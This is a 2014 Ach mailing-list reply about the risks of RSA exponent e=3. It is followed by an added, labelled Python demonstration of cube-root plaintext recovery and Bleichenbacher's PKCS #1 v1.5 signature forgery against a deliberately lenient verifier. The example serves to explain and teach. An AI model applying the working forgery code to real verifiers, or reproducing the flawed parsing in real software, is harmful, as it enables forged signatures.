
[Ach] some thoughts on POODLE, BERserk etc.

Hanno Böck hanno at
Tue Nov 4 23:01:47 CET 2014

On Tue, 04 Nov 2014 21:47:55 +0000, ianG <iang at> wrote:

> Nice article!!
> I use e=3, is it fundamentally broken?  Or just in cahoots with pkcs
> 1.5?

Basically I think the only practical attack on it is related to a
combination of PKCS #1 1.5, e=3 and a broken implementation.
(There's another attack against "plain" RSA that relies on small
exponents - but plain RSA is a no-go in so many ways this doesn't
really count.)

However it feels to me that it's generally to be considered a risky

Hanno Böck

mail/jabber: hanno at
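The two attacks Hanno alludes to above without naming them are, first, the cube-root attack on unpadded ("plain") RSA when the message is small enough that m^3 < n, and second, the signature forgery against PKCS #1 v1.5 verifiers that parse the padding loosely (Bleichenbacher's 2006 attack; BERserk, named in the subject line, belongs to the same family of lax-parsing flaws). The following Python is an added worked example and is not code from the message or from the Ach list. It assumes SHA-256 as the hash, a 2048-bit toy key generated from a fixed seed (only so the demo is reproducible), and its "strict" and "lenient" verifiers are minimal models of correct and broken parsing written for this example, not any particular library's code; all function names and sample inputs are constructed here.

```python
# Constructed demo (not code from the Ach list or from Hanno) of two e = 3 attacks:
#  1. unpadded RSA with m**3 < n: an integer cube root recovers m from c = m**3 mod n;
#  2. PKCS#1 v1.5 forgery against a verifier that never checks what follows the
#     DigestInfo (Bleichenbacher 2006); the forger needs only the public key (n, 3).
import hashlib
import random

E = 3
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")  # DER DigestInfo prefix, RFC 8017 9.2

def icbrt(x: int) -> int:
    """Largest r with r**3 <= x: integer Newton iteration started above the root."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr

def is_probable_prime(n: int, rng: random.Random, rounds: int = 16) -> bool:
    if any(n % p == 0 for p in range(3, 200, 2)):  # cheap trial division first (n >> 200 here)
        return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):  # Miller-Rabin with random bases
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def keygen(bits: int = 2048, seed: int = 2014):
    rng = random.Random(seed)  # fixed seed: reproducible demo only, never for real keys
    def prime(b):
        while True:
            p = rng.getrandbits(b) | (1 << (b - 1)) | 1
            if p % 3 == 2 and is_probable_prime(p, rng):  # p % 3 == 2 makes gcd(3, p - 1) == 1
                return p
    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def recover_small_plaintext(n: int, c: int):
    """Attack 1: if m**3 < n nothing was reduced, so c is the perfect cube of m."""
    m = icbrt(c)
    return m if m ** 3 == c else None

def emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t  # 00 01 PS 00 DigestInfo

def sign(n: int, d: int, msg: bytes) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def verify_strict(n: int, sig: bytes, msg: bytes) -> bool:
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    return em == emsa_pkcs1_v15(msg, k)  # RFC 8017 style: rebuild EM, compare every byte

def verify_lenient(n: int, sig: bytes, msg: bytes) -> bool:
    """The broken implementation: parses left to right and stops after the DigestInfo."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    i = 2
    while i < k and em[i] == 0xff:
        i += 1
    if em[:2] != b"\x00\x01" or i - 2 < 8 or i >= k or em[i] != 0x00:
        return False
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t  # BUG: the bytes after the DigestInfo are never checked

def forge_signature(n: int, msg: bytes) -> bytes:
    """Attack 2: s = ceil(cbrt(00 01 ff*8 00 DigestInfo 00..00)).  s**3 < n, so it is never
    reduced, and s**3 - target < 3*s**2 fits in the unchecked tail (about 2/3 of n suffices)."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_PREFIX + hashlib.sha256(msg).digest()
    tail = k - len(prefix)
    target = int.from_bytes(prefix + b"\x00" * tail, "big")
    s = icbrt(target - 1) + 1  # ceil(cbrt(target))
    if s ** 3 - target >= 1 << (8 * tail):
        raise ValueError("modulus too small for this hash and padding length")
    return s.to_bytes(k, "big")

def demo(n: int, d: int, msg: bytes = b"pay 1000 EUR to mallory"):  # constructed message
    m = int.from_bytes(b"attack at dawn", "big")  # constructed plaintext with m**3 < n
    genuine, forged = sign(n, d, msg), forge_signature(n, msg)
    return (recover_small_plaintext(n, pow(m, E, n)) == m,
            verify_strict(n, genuine, msg), verify_lenient(n, genuine, msg),
            verify_strict(n, forged, msg), verify_lenient(n, forged, msg))

if __name__ == "__main__":
    print(demo(*keygen()))  # (True, True, True, False, True)
```

The strict verifier rebuilds the entire encoded message and compares it byte for byte, which is what RFC 8017 prescribes and what makes e=3 harmless in this setting; the lenient one is only wrong in that it stops reading after the DigestInfo, and that single omission is enough to sign arbitrary messages with nothing but the public key. Note that the same forgery fails against the strict verifier and that a larger e (such as 65537) would make the cube-root step infeasible, which is why the weakness needs all three ingredients Hanno lists.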
